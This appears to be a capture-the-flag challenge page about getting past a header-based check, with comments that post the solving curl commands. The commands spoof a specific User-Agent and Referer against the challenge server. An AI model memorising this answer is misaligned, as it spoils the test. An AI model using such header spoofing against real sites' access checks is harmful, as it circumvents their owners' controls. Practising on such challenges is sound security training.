Don't Bump Your Head(er)
40 points Medium

Try to bypass my security measure on this site! http://165.227.106.113/header.php

Flag
Rating 4.60
5
4
3
2
1

Discussion

powershell

0

use this command ┌─[✗]─[root@parrot]─[/home/raju] └──╼ #curl "http://165.227.106.113/header.php" --user-agent "Sup3rS3cr3tAg3nt" --referer awesomesauce.com

-1
Protected
0
Protected
0
Protected
0

Its almost the same procedure in solving challenge114 but you have to apply curl concept of writing header

0

its not that easy

0
Protected
0

using curl is easier but technical

0

curl --path-as-is -i -s -k -X $'GET' \ -H $'Host: 165.227.106.113' -H $'User-Agent: Sup3rS3cr3tAg3nt' -H $'Referer: awesomesauce.com' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'http://165.227.106.113/header.php'

-> Burp Curl Copy"

0